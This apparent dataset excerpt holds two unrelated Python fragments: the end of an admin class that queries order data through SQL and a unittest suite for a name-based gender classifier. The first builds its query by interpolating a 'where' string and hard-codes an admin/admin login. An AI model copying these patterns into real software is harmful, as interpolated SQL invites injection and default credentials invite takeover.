inner JOIN product p on p.id = o.product_id {where}"""
result = self._getData(table, fields, selector)
fieldNames = ["id", "employee", "city_name",
"date_of_birth", "customer", "product_name", 'price']
сhangeRes = []
for item in result:
cort = {}
for index, element in enumerate(item):
cort[fieldNames[index]] = element
сhangeRes.append(cort)
return сhangeRes
else:
return 'Incorrect login or password'
if __name__ == '__main__':
admin1 = Admin('admin', 'admin')
orders = admin1.get_order_info('city_name', 'London')
pprint(orders)
|
import unittest
import sys
import os
sys.path.append(os.path.join('..', 'Src'))
from GenderClassification import GenderClassify
class GenderClassificationTestCase(unittest.TestCase):
def testGeneralGenderAccuracy(self):
genderClassification = GenderClassify()
genderAccuracy = genderClassification.genderClassify('Adam')[1]
print(genderAccuracy)
self.assertTrue(genderAccuracy>0.7)
def testFemale(self):
genderClassification = GenderClassify()
firstFemale = genderClassification.genderClassify("Anna")
secondFemale = genderClassification.genderClassify("Katrina")
thirdFemale = genderClassification.genderClassify("Sabrina")
fourthFemale = genderClassification.genderClassify("Samantha")
females = [firstFemale[0], secondFemale[0], thirdFemale[0], fourthFemale[0]]
self.assertCountEqual(females, ['female', 'female', 'female', 'female'])
def testMale(self):
genderClassification = GenderClassify()
firstMale = genderClassification.genderClassify("Abdul")
secondMale = genderClassification.genderClassify("Apostolos")
thirdMale = genderClassification.genderClassify("John")
fourthMale = genderClassification.genderClassify("Thomas")
males = [firstMale[0], secondMale[0], thirdMale[0], fourthMale[0]]
self.assertCountEqual(males, ['male', 'male', 'male', 'male'])
if __name__ == '__main__':
unittest.main() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.